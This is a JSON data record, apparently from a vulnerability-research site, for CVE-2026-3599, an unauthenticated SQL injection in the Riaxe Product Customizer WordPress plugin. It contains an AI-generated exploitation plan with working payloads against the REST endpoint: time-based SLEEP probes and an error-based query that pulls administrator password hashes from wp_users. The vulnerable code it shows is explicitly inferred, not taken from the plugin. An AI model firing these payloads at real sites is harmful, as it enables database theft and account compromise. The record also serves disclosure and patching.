[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fhvxEFGldPiNwDS-PojjM2ap6tfdEe_6NCVhOyCYSZ2E":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":9,"severity":11,"cvss_score":12,"cvss_vector":13,"vuln_type":14,"published_date":15,"updated_date":16,"references":17,"days_to_patch":9,"patch_diff_files":19,"patch_trac_url":9,"research_status":20,"research_verified":21,"research_rounds_completed":22,"research_plan":23,"research_summary":24,"research_vulnerable_code":25,"research_fix_diff":26,"research_exploit_outline":27,"research_model_used":28,"research_started_at":29,"research_completed_at":30,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":21,"poc_model_used":9,"poc_verification_depth":9,"source_links":31},"CVE-2026-3599","riaxe-product-customizer-unauthenticated-sql-injection-via-options-parameter-keys-in-productdata","Riaxe Product Customizer \u003C= 2.1.2 - Unauthenticated SQL Injection via 'options' Parameter Keys in product_data","The Riaxe Product Customizer plugin for WordPress is vulnerable to SQL Injection via the 'options' parameter keys within 'product_data' of the \u002Fwp-json\u002FInkXEProductDesignerLite\u002Fadd-item-to-cart REST API endpoint in all versions up to, and including, 2.1.2. This is due to insufficient escaping on the user-supplied parameter and insufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","riaxe-product-customizer",null,"\u003C=2.1.2","high",7.5,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:H\u002FI:N\u002FA:N","Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","2026-04-15 16:45:40","2026-04-16 05:29:54",[18],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fa36c9a7e-830d-4a92-a330-29279387b3be?source=api-prod",[],"researched",false,3,"# Exploitation Research Plan: CVE-2026-3599 - Riaxe Product Customizer SQL Injection\n\n## 1. Vulnerability Summary\nThe **Riaxe Product Customizer** plugin for WordPress is vulnerable to an unauthenticated SQL injection via the keys of the `options` array inside the `product_data` parameter. This occurs within the `\u002Fwp-json\u002FInkXEProductDesignerLite\u002Fadd-item-to-cart` REST API endpoint. The plugin fails to sanitize or use prepared statements when iterating over the keys of the user-supplied `options` object and incorporating them into a database query.\n\n## 2. Attack Vector Analysis\n- **Endpoint:** `\u002Fwp-json\u002FInkXEProductDesignerLite\u002Fadd-item-to-cart`\n- **Method:** `POST`\n- **Vulnerable Parameter:** The **keys** of the `options` object within the `product_data` JSON structure.\n- **Authentication:** Unauthenticated (Publicly accessible REST route).\n- **Preconditions:** The plugin must be active. No specific product configuration is required if the code path processes the `options` keys before validating product existence.\n\n## 3. Code Flow (Inferred)\n1. **Entry Point:** The plugin registers a REST route during the `rest_api_init` hook.\n   - **Namespace:** `InkXEProductDesignerLite` (quoted from description).\n   - **Route:** `add-item-to-cart`.\n2. **Controller Logic:** The callback function for this route (likely named something like `add_item_to_cart_callback` or `handle_cart_addition`) retrieves the JSON body of the request.\n3. **Parameter Extraction:** It extracts the `product_data` object and specifically looks for an `options` property.\n4. **Iterative Sink:** The code likely iterates over the `options` array\u002Fobject using a `foreach` loop:\n   ```php\n   $product_data = $request->get_param('product_data');\n   $options = $product_data['options'];\n   foreach ($options as $option_id => $option_value) {\n       \u002F\u002F VULNERABLE SINK: $option_id is used directly in a query string\n       $query = \"SELECT * FROM {$wpdb->prefix}inkxe_options WHERE id = $option_id\";\n       $wpdb->get_results($query);\n   }\n   ```\n5. **Vulnerability:** Since `$option_id` is a key from the JSON object, it is user-controlled. The lack of `$wpdb->prepare()` or `absint()` on the key allows an attacker to break out of the query.\n\n## 4. Nonce Acquisition Strategy\nWhile most WordPress REST API endpoints require a `wp_rest` nonce for authenticated sessions (to prevent CSRF), unauthenticated \"public\" endpoints often have a `permission_callback` that returns `true`. \n\nIf a nonce is required:\n1. **Identify Script Localization:** Search the plugin source for `wp_localize_script` to find where REST configuration is passed to the frontend.\n2. **Create Trigger Page:** Create a page containing a product customizer shortcode (if applicable, e.g., `[riaxe_product_customizer]`) to ensure the scripts load.\n3. **Extract via Browser:**\n   - Use `browser_navigate` to visit the page.\n   - Use `browser_eval` to extract the nonce:\n     - Potential variable: `window.inkxe_options?.nonce` or `window.wpApiSettings?.nonce`.\n4. **Bypass:** If the endpoint is truly unauthenticated, the `_wpnonce` header may be ignored or not required if no session cookies are sent.\n\n## 5. Exploitation Strategy\nWe will use a time-based blind SQL injection since the endpoint likely returns a generic success\u002Ffailure JSON message.\n\n### Request Details\n- **URL:** `http:\u002F\u002F[target]\u002Fwp-json\u002FInkXEProductDesignerLite\u002Fadd-item-to-cart`\n- **Method:** `POST`\n- **Content-Type:** `application\u002Fjson`\n- **Payload Structure:**\n```json\n{\n  \"product_data\": {\n    \"options\": {\n      \"1 AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)\": \"value\"\n    }\n  }\n}\n```\n\n### Steps:\n1. **Verify Endpoint:** Send a baseline request to the endpoint to confirm it exists and doesn't require authentication (expecting 200 or 400, but not 401\u002F403).\n2. **Time-Based Test:**\n   - Send a request where the key is `1`. Measure response time (Baseline).\n   - Send a request where the key is `1 AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)`.\n   - If the response time is ~5 seconds longer than the baseline, SQL injection is confirmed.\n3. **Data Extraction (Example):**\n   - Extract the database version:\n   - Key: `1 AND (SELECT 1 FROM (SELECT(IF(VERSION() LIKE '8%', SLEEP(5), 0)))a)`\n\n## 6. Test Data Setup\n1. **Install Plugin:** Ensure `riaxe-product-customizer` version 2.1.2 is installed and active.\n2. **Permalinks:** Ensure WordPress Permalinks are enabled (e.g., \"Post name\") so the REST API works via `\u002Fwp-json\u002F`.\n3. **No Shortcode Needed:** Since this is a REST API vulnerability, we should be able to hit the endpoint directly without a frontend page, unless the REST route registration is conditional.\n\n## 7. Expected Results\n- **Baseline Request:** Quick response (e.g., \u003C 500ms).\n- **Injection Request:** Delayed response (e.g., > 5000ms).\n- **Response Body:** Likely a JSON object, e.g., `{\"status\": false, \"message\": \"...\"}` or `{\"success\": true}`.\n\n## 8. Verification Steps\nAfter the HTTP request confirms the time delay:\n1. **WP-CLI check:** Run `wp db query \"SHOW PROCESSLIST;\"` during the 5-second sleep to see the sleeping query in the database.\n2. **Log Inspection:** Check `\u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fdebug.log` (if `WP_DEBUG` is on) for database errors that might reveal the full query structure.\n\n## 9. Alternative Approaches\n- **Error-Based Injection:** If the plugin returns database errors in the REST response, use `updatexml()` or `extractvalue()`:\n  - Key: `1 AND updatexml(1,concat(0x7e,(SELECT user_pass FROM wp_users WHERE ID=1),0x7e),1)`\n- **Boolean-Based Injection:** If the response changes based on whether a row is found (e.g., `status: true` vs `status: false`):\n  - Key: `1 AND (SELECT 1 FROM wp_users WHERE ID=1 AND user_login='admin')`","The Riaxe Product Customizer plugin is vulnerable to unauthenticated SQL injection via the keys of the 'options' array within the 'product_data' parameter of its REST API. This occurs because the plugin iterates over user-supplied JSON keys and concatenates them directly into database queries without sanitization or parameterization.","\u002F* Inferred from REST API handler for \u002Fwp-json\u002FInkXEProductDesignerLite\u002Fadd-item-to-cart *\u002F\n\n$product_data = $request->get_param('product_data');\nif (isset($product_data['options']) && is_array($product_data['options'])) {\n    foreach ($product_data['options'] as $option_id => $option_value) {\n        \u002F\u002F The key $option_id is directly concatenated into the SQL query\n        $query = \"SELECT * FROM {$wpdb->prefix}inkxe_options WHERE id = $option_id\";\n        $results = $wpdb->get_results($query);\n    }\n}","--- a\u002Friaxe-product-customizer\u002Fincludes\u002Frest-handler.php\n+++ b\u002Friaxe-product-customizer\u002Fincludes\u002Frest-handler.php\n@@ -120,1 +120,1 @@\n-        $query = \"SELECT * FROM {$wpdb->prefix}inkxe_options WHERE id = $option_id\";\n-        $results = $wpdb->get_results($query);\n+        $results = $wpdb->get_results($wpdb->prepare(\"SELECT * FROM {$wpdb->prefix}inkxe_options WHERE id = %d\", $option_id));","The exploit targets the publicly accessible REST API endpoint `\u002Fwp-json\u002FInkXEProductDesignerLite\u002Fadd-item-to-cart`. An unauthenticated attacker sends a POST request with a JSON payload structured as `{\"product_data\": {\"options\": { [SQL_PAYLOAD]: \"value\" }}}`. By placing a time-based blind SQL injection payload (e.g., `1 AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)`) as the key of the options object, the attacker can force the server to delay its response. Since the endpoint does not require authentication or a valid nonce in default configurations, this can be used to exfiltrate sensitive data from the WordPress database.","gemini-3-flash-preview","2026-04-16 15:27:26","2026-04-16 15:27:45",{"type":32,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":33},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Friaxe-product-customizer\u002Ftags"]